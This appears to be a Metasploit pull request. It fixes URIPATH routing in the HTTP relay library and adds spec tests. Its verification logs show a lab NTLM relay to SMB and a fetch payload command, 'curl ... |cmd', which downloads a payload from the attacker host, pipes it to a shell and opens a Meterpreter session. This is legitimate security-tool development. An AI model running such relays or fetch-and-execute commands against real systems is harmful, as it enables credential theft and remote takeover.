### PR TITLE
Fix bug where relay server failed to work if the attacker used the UR…

### DIFF
--- a/lib/msf/core/exploit/remote/http_server/relay.rb
+++ b/lib/msf/core/exploit/remote/http_server/relay.rb
@@ -21,22 +21,29 @@ module Msf
             OptInt.new('RELAY_TIMEOUT', [true, 'Seconds that the relay socket will wait for a response after the client has initiated communication.', 25])
           ], self.class
         )
+        deregister_options('URIPATH')
         @relay_clients = {}
         @relay_clients_mutex = Mutex.new
       end
 
+      # Every request, regardless of path, is serviced by the relay state machine - clients
+      # get bounced between targets via 307 redirects to randomly generated paths, so there's
+      # no single meaningful URIPATH to relay traffic through. Route the base HttpServer's
+      # resource registration straight to #on_relay_request at '/' instead of letting it mount
+      # its own (otherwise unused) resource_uri resource: Rex::Proto::Http::Server dispatches
+      # requests to the longest matching path prefix, so a second, more specific resource would
+      # silently swallow any request that happened to match it.
       def start_service(opts = {})
         @logger = opts['Logger'] || self
+
+        opts['Uri'] = {
+          'Proc' => Proc.new { |cli, req| on_relay_request(cli, req) },
+          'Path' => '/'
+        }
 
         super
 
         @http_relay_service = self.service
-
-        relay_path = '/'
-        add_resource(
-          'Proc' => Proc.new { |cli, req| on_relay_request(cli, req) },
-          'Path' => relay_path
-        )
       end
 
       def on_relay_request(cli, req)

--- a/spec/lib/msf/core/exploit/remote/relay/http_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/relay/http_spec.rb
@@ -145,6 +145,33 @@ RSpec.describe Msf::Exploit::Remote::HttpServer::Relay do
     end
   end
 
+  describe '#start_service' do
+    let(:service_double) do
+      service = double('service')
+      allow(service).to receive(:server_name=)
+      allow(service).to receive(:add_resource)
+      service
+    end
+
+    before do
+      allow(Rex::ServiceManager).to receive(:start).and_return(service_double)
+    end
+
+    it 'mounts a single catch-all resource at "/" regardless of URIPATH' do
+      relay_server.datastore['URIPATH'] = '/custom-uripath'
+
+      mounted_paths = []
+      allow(service_double).to receive(:add_resource) { |path, _opts| mounted_paths << path }
+
+      relay_server.start_service
+
+      # A second resource mounted at the (longer, more specific) URIPATH would silently swallow
+      # any request matching it, since Rex::Proto::Http::Server routes to the longest matching
+      # path prefix and the base HttpServer#on_request_uri handler for that resource is a no-op.
+      expect(mounted_paths).to eq(['/'])
+    end
+  end
+
   describe 'Target Iteration and Exhaustion' do
     let(:req1) { create_request("NTLM #{type1_b64}") }
     let(:req3) { create_request("NTLM #{type3_b64}") }


### PR DESCRIPTION
## Description

This PR fixes a bug I found while testing https://github.com/rapid7/metasploit-framework/pull/21620

The issue was that the relay failed if the target requested the URIPATH value provided in the module setup. Any other path requested was relayed properly. This confused me greatly.

The reason it failed was that the http relay library code called `super` on `start_service` which created an HTTP server with the resource provided in `URIPATH`, and then it went on to specifically add a second catch-all resource for the relay using `/`.

That created a situation where anything not matching a resource in the HTTP server was sent to `on_relay_request` (yes, good!) but anything that matched a registered resource was sent to `on_request_uri` to get that resource (also good!).  Unfortunately, that resource had no data attached to it, so it silently failed and was eaten by exception handling (no, bad!).

This fix:

1. Removes the URIPATH option because we don't need it.

2. Populates the `opts` hash with the catch-all `/` and calls `super` in http_relay rather than calling `super` and then adding the resource separately.

3. Removes call to register `/` as a resource.

4. Adds Spec tests


## Breaking Changes

I don't believe this breaks anything, but this library is also used by the `http_to_ldap` module.

## Reviewer Notes

None

## Verification Steps

First, Create the relay and verify that it works:

```

msf auxiliary(server/relay/http_to_smb) > show options

Module options (auxiliary/server/relay/http_to_smb):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   JOHNPWFILE                      no        Name of file to store JohnTheRipper hashes in. Supports NTLMv1 an
                                             d NTLMv2 hashes, each of which is stored in separate files. Can a
                                             lso be a path.
   RELAY_TIMEOUT  25               yes       Seconds that the relay socket will wait for a response after the
                                             client has initiated communication.
   RHOSTS                          yes       Target address range or CIDR identifier to relay to
   RPORT          445              yes       The target port (TCP)
   SRVHOST        0.0.0.0          yes       The local host to listen on.
   SRVPORT        80               yes       The local port to listen on.
   SRVSSL         false            no        Negotiate SSL/TLS for local server connections
   SSL            false            no        Negotiate SSL for incoming connections
   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)


Auxiliary action:

   Name                Description
   ----                -----------
   CREATE_SMB_SESSION  Create an SMB session



View the full module info with the info, or info -d command.

msf auxiliary(server/relay/http_to_smb) > set rhosts 10.5.134.192
rhosts => 10.5.134.192
msf auxiliary(server/relay/http_to_smb) > set srvhost 10.5.135.210
srvhost => 10.5.135.210
msf auxiliary(server/relay/http_to_smb) > run
[*] Auxiliary module running as background job 0.
msf auxiliary(server/relay/http_to_smb) > 
[*] Using URL: http://10.5.135.210/
[*] Server started.

msf auxiliary(server/relay/http_to_smb) > use 
[*] Received GET request for /test from 10.5.134.194:59058
[*] Processing request in state unauthenticated from 10.5.134.194
[*] Received GET request for /test from 10.5.134.194:59059
[*] Processing request in state unauthenticated from 10.5.134.194
[*] Received Type 1 message from 10.5.134.194, attempting to relay...
[*] Attempting to relay to 10.5.134.192:445
[*] Received type2 from target smb://10.5.134.192:445, attempting to relay back to client
[*] Received GET request for /test from 10.5.134.194:59059
[*] Processing request in state awaiting_type3 from 10.5.134.194
[*] Received Type 3 message from 10.5.134.194, attempting to relay...
[+] Identity: WHISTLER\sandy - Successfully relayed NTLM authentication to SMB!
[+] Relay succeeded
[*] Target list exhausted for 10.5.134.194. Closing connection.
```

Next, **DO NOT CLOSE THE RELAY**, just hit enter and use something else that needs an HTTP server.  Be sure to use the same port.  The goal here is to make sure that the relay catches anything NOT registered as a resource, but that if someone adds a resource to the HTTP server, it is served properly.  I chose an HTTP-based fetch payload:

```
msf auxiliary(server/relay/http_to_smb) > use payload/cmd/windows/http/x64/meterpreter/reverse_tcp
msf payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > set fetch_command curl
fetch_command => CURL
msf payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > set fetch_srvport 80
fetch_srvport => 80
msf payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > set fetch_pipe true
fetch_pipe => true
msf payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > set fetch_uripath q
fetch_uripath => q
msf payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > set verbose true
verbose => true
msf payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > to_handler
[-] Msf::OptionValidateError One or more options failed to validate: LHOST.
msf payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > set lhost 10.5.135.210
lhost => 10.5.135.210
msf payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > to_handler
[*] Command to execute on target: curl -s http://10.5.135.210:80/q|cmd
[*] Payload Handler Started as Job 1

[*] Fetch handler listening on 10.5.135.210:80
[*] HTTP server started
[*] Adding resource /Se3SuyaEumAWZkcd-UKQHw
[*] Adding resource /q
[*] Started reverse TCP handler on 10.5.135.210:4444 
```

Now, I resend the relay request to verify that we are serving the relay and the payloads....

```
msf payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > [*] Received GET request for /test from 10.5.134.194:59107
[*] Processing request in state unauthenticated from 10.5.134.194
[*] Received GET request for /test from 10.5.134.194:59111
[*] Processing request in state unauthenticated from 10.5.134.194
[*] Received Type 1 message from 10.5.134.194, attempting to relay...
[*] Attempting to relay to 10.5.134.192:445
[*] Received type2 from target smb://10.5.134.192:445, attempting to relay back to client
[*] Received GET request for /test from 10.5.134.194:59111
[*] Processing request in state awaiting_type3 from 10.5.134.194
[*] Received Type 3 message from 10.5.134.194, attempting to relay...
[*] Skipping previously captured hash for WHISTLER\sandy
[+] Identity: WHISTLER\sandy - Successfully relayed NTLM authentication to SMB!
[+] Relay succeeded
```

Now, verify the HTTP server will serve the fetch payload:
```
[*] Target list exhausted for 10.5.134.194. Closing connection.
[*] Client 10.5.134.194 requested /q
[*] Sending payload to 10.5.134.194 (curl/7.83.1)
[*] Client 10.5.134.194 requested /Se3SuyaEumAWZkcd-UKQHw
[*] Sending payload to 10.5.134.194 (curl/7.83.1)
[*] Sending stage (248902 bytes) to 10.5.134.194
[*] Meterpreter session 3 opened (10.5.135.210:4444 -> 10.5.134.194:59114) at 2026-07-15 16:34:54 -0500

```


## Test Evidence

See above

## Environment

msfconsole on Ubuntu 26, relay on Windows 10x64 to Windows Server 2025
Ask me for target access

## AI Usage Disclosure

Claude helped locate the issue, and then suggested that we replace `on_uri_request` with `on_relay_request` which I think would have caused the relay to serve everything, and that is not what we want, so I came up with this option.  I also had Claude make the spec tests.


## Pre-Submission Checklist

- [x] Tested on the target environment specified in the Environment section above
- [x] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [x] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)
